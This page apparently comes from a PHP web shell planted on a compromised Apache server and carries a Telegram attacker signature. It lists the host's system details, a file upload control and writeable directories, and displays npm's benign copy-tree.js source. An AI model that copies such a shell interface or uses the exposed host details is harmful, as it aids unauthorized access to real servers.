https://t.me/AnonymousX5
Server : Apache
System : Linux cvar2.toservers.com 3.10.0-962.3.2.lve1.5.73.el7.x86_64 #1 SMP Wed Aug 24 21:31:23 UTC 2022 x86_64
User : njnconst ( 1116)
PHP Version : 8.4.18
Disable Function : NONE
Directory :  /opt/alt/alt-nodejs9/root/lib/node_modules/npm/lib/install/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/alt/alt-nodejs9/root/lib/node_modules/npm/lib/install/copy-tree.js
'use strict'
var createNode = require('./node.js').create
module.exports = function (tree, filter) {
  return copyTree(tree, {}, filter)
}

function copyTree (tree, cache, filter) {
  if (filter && !filter(tree)) { return null }
  if (cache[tree.path]) { return cache[tree.path] }
  var newTree = cache[tree.path] = createNode(Object.assign({}, tree))
  copyModuleList(newTree, 'children', cache, filter)
  newTree.children.forEach(function (child) {
    child.parent = newTree
  })
  copyModuleList(newTree, 'requires', cache, filter)
  copyModuleList(newTree, 'requiredBy', cache, filter)
  return newTree
}

function copyModuleList (tree, key, cache, filter) {
  var newList = []
  if (tree[key]) {
    tree[key].forEach(function (child) {
      const copy = copyTree(child, cache, filter)
      if (copy) {
        newList.push(copy)
      }
    })
  }
  tree[key] = newList
}

https://t.me/AnonymousX5 - 2025